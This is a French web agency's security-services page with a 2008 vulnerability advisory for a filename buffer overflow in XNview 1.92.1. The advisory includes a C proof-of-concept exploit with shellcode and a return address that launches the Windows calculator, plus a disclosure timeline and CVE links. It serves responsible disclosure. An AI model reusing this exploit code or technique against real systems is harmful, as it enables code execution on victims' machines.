Sites Internet
Graphisme
Référencement
Publicité
Autres services
Dernières réalisations
Lancement du site Marchés Gourmands

Lancement du site Marchés Gourmands

Mise en ligne : 09/05/2016

Refonte du site e-commerce Blackkross.com

Refonte du site e-commerce Blackkross.com

Mise en ligne : 06/05/2014

Biofinesse - Refonte du site Internet

Biofinesse - Refonte du site Internet

Mise en ligne : 01/02/2014

Mise en place d'un système de blog sur eedf.fr

Mise en place d'un système de blog sur eedf.fr

Mise en ligne : 10/07/2013

Sécurité informatique

Click Internet - Recherches en sécurité La sécurité informatique est un secteur qui doit aller de pair avec n'importe quel développement mis en place. Si aucune application ne peut se déclarer infaillible, quel que soit le temps investi dans sa sécurisation, on peut néanmoins réduire grandement les risques liés à un défaut de sécurisation en prenant en compte ce facteur avant même la phase de conception.
A travers notre veille permanente sur la sécurité informatique, nous tâchons d'être toujours informés des nouvelles méthodes ainsi que des moyens de corrections actuels. Nous mettons également en place régulièrement des systèmes dotés de mécanisme de sécurité avancés.

En complément de cette veille, nous procédons également à des audits sur des logiciels, à titre gracieux, afin de sensibiliser les internautes à la sécurité informatique trop peu prise en considération en France.

Audit de sécurité

Votre site Internet est en place mais vous voulez vous assurer qu'aucunes failles connues n'est exploitable ? La solution est de mener un audit de sécurité qui permettra de valider l'ensemble des traitements sensibles qui pourraient mener à une corruption de votre système.

Un audit de sécurité permet de prévenir les éventuels problèmes que vous pourriez rencontrer. Il se peut aussi qu'un individu mal intentionné ait déjà corrompu votre site auquel cas l'audit permettra de mettre en évidences les fichiers malveillants qu'il aurait pu installer (backdoor, trojan, ...) afin de régler le problème au plus vite.

Il faut savoir que la plupart des systèmes informatiques détournés, et plus particulièrement les sites Internet, servent de base à des actions malveillantes dont vous êtes responsable en cas de plainte. Par exemple, nous voyons fréquemment des sites Internet qui servent de relais pour l'envoi de spam ou bien encore de phishing.

Application de correctifs

Après l'audit de sécurité, nous mettons en oeuvre l'ensemble des correctifs de sécurité nécessaires en définissant un ordre de priorité clairement établi. Nous corrigeons ainsi en premier lieux les failles critiques jusqu'aux failles représentants un risque défini comme étant faibles.

Nous émettons également des recommandations afin de faire en sorte que vos équipes internes acquièrent les bases de la sécurité informatique pour que vous puissiez intégrer cette méthodologie à votre processus de production.


Avis de Sécurité

Click Internet agit et intervient concrètement dans la recherche en matiére de sécurité informatique notamment en publiant régulièrement des avis de vulnérabilité touchant tout type d'application.

Ces recherches on pour but principal la sensibilisation à la sécurité informatique.


Buffer overflow dans XNview 1.92.1

Buffer overflow dans XNview 1.92.1
[Postée le 15/03/2008]

Click Internet a découvert une faille de sécurité dans le célèbre logiciel XNview qui a été corrigée sur la version 1.93.1 .


XNview

Informations
Version : 1.92.1
Site : www.xnview.com
Problème : Buffer Overflow


Description
XNView est un gratuiciel qui permet de faire des modifications élémentaires sur des images.
Son principal avantage est de reconnaître un très grand nombre de format de fichiers(plus de 100) .

Détails

Le probléme se situe au niveau de la gestion des noms de fichier ce qui permet à un attaquant de faire éxécuter du code via XNview.

Exploit
/*Ouvre simplement la calculatrice windows*/

#include <windows.h>
#include <unistd.h> 

unsigned char shellcode[] =
"\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x16"
"\x77\x0b\x94\x83\xeb\xfc\xe2\xf4\xea\x9f\x4f\x94\x16\x77\x80\xd1"
"\x2a\xfc\x77\x91\x6e\x76\xe4\x1f\x59\x6f\x80\xcb\x36\x76\xe0\xdd"
"\x9d\x43\x80\x95\xf8\x46\xcb\x0d\xba\xf3\xcb\xe0\x11\xb6\xc1\x99"
"\x17\xb5\xe0\x60\x2d\x23\x2f\x90\x63\x92\x80\xcb\x32\x76\xe0\xf2"
"\x9d\x7b\x40\x1f\x49\x6b\x0a\x7f\x9d\x6b\x80\x95\xfd\xfe\x57\xb0"
"\x12\xb4\x3a\x54\x72\xfc\x4b\xa4\x93\xb7\x73\x98\x9d\x37\x07\x1f"
"\x66\x6b\xa6\x1f\x7e\x7f\xe0\x9d\x9d\xf7\xbb\x94\x16\x77\x80\xfc"
"\x2a\x28\x3a\x62\x76\x21\x82\x6c\x95\xb7\x70\xc4\x7e\x87\x81\x90"
"\x49\x1f\x93\x6a\x9c\x79\x5c\x6b\xf1\x14\x6a\xf8\x75\x59\x6e\xec"
"\x73\x77\x0b\x94";

unsigned char ret[] ="\x34\x59\x40\x7e";

int main(int argc,char *argv[]){
char *bufExe[3];
char buf[511];
bufExe[0] = "xnview.exe";
bufExe[2] = NULL;
memset(buf,0x90,511);
memcpy(&buf[260],ret,4);  
memcpy(&buf[330],shellcode,sizeof(shellcode));  
bufExe[1] = buf;
 
execve(bufExe[0],bufExe,NULL);
return 0x0;
}

Historique
04/02/2008 : Découverte de la vulnérabilité
12/02/2008 : Notification de la faille à l'éditeur
13/02/2008 : Réponse de l'éditeur
14/03/2008 : Mise à disposition de la version 1.93.1
15/03/2008 : Publication de l'avis de sécurité

 

Liens
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-1461
http://www.securityfocus.com/bid/28259
http://www.nsfocus.net/vulndb/11622
http://packetstorm.offensive-security.com/filedesc/xnview-overflow.txt.html
http://seclists.org/bugtraq/2008/Mar/0198.html


Consulter tous les avis de sécurité